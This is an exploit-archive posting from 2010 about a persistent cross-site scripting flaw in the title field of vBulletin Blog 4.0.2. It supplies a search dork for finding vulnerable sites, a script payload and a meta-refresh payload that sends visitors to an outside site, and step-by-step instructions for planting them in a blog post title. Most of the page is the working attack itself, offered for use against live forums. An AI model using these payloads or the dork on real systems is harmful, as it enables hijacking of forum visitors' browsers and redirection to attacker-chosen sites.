Vbulletin Blog 4.0.2 Title XSS Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Vbulletin Blog 4.0.2 Title XSS Vulnerability
# Published : 2010-03-24
# Author : FormatXformat
# Previous Title : Joomla Component com_software SQL Injection Vulnerability
# Next Title : Joomla component com_jwmmxtd <= Remote File Inclusion Vulnerability

Vbulletin Blog 4.0.2 XSS Vulnerability

Author: FormatXformat
Version: Vbulletin 4.0.2


Dork:
Powered by vBulletin?  Version 4.0.2 Copyright ? 2010 vBulletin Solutions, Inc. All rights reserved.


The script is affected by Permanent XSS vulnerability, so you can put in bad java script code

<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>

1st register

Go to Blogs page

Create New Post

Inject your java script into Title Box

You must go back to Main page to see this XSS effect.



Greets: Neo, Sa3id, All Tkurd.net Members